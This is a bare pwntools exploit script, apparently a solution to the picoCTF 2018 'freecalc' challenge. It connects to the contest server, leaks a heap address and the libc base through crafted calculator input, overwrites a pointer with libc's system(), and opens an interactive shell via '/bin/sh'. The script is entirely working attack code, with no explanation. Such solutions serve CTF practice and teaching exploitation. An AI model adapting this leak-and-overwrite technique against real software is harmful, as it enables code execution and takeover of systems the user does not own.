pico 2018 freecalc

1. from pwn import *
2.  
3. libc = ELF('./libc.so.6')
4. #r = process('./calc')
5. r = remote('2018shell3.picoctf.com', 54291)
6.  
7. f = ['a', 'b', 'c', 'd', 'e']
8. pay = [': {} 7 + + + + + + + '.format(c) for c in f]
9. r.sendlineafter('>> ', ''.join(pay))
10. r.sendlineafter('>> ', ': f 7 + + + + + + +'.rjust(0x6f, ' '))
11. pay = ': a 8 + + + + + + + + '
12. pay += 'f'
13. pay = pay.ljust(0x20, '\x00')
14. pay += p64(7) + p64(0x601b80)
15. pay += p64(6) + p64(0x601c88)
16. pay += p64(6) + p64(0x601c90)
17. pay += p64(7) + p64(0x601c88)
18. pay += p64(5)
19. r.sendlineafter('>> ', pay)
20.  
21. r.recvuntil('Running ')
22. r.recvuntil('Running ')
23. heap = u64(r.recvline()[:-1].ljust(8, '\x00'))
24. heap_base = heap - 0x470
25. print hex(heap_base)
26. r.recvuntil('Running ')
27. libc.address = u64(r.recvline()[:-1].ljust(8, '\x00')) - libc.symbols['free']
28. print hex(libc.address)
29.  
30. pay = '/bin/sh; f '.ljust(16, '\x00')
31. pay += p64(5) + p64(heap_base+0x450)
32. pay += p64(heap_base + 0x50) + p64(1)
33. pay += p64(7) + p64(heap_base+0x28)
34. pay += p64(libc.symbols['system']) + p64(0)
35. pay += p64(5) + p64(0)
36. pay += p64(5)
37. r.sendlineafter('>> ', pay)
38.  
39. r.interactive()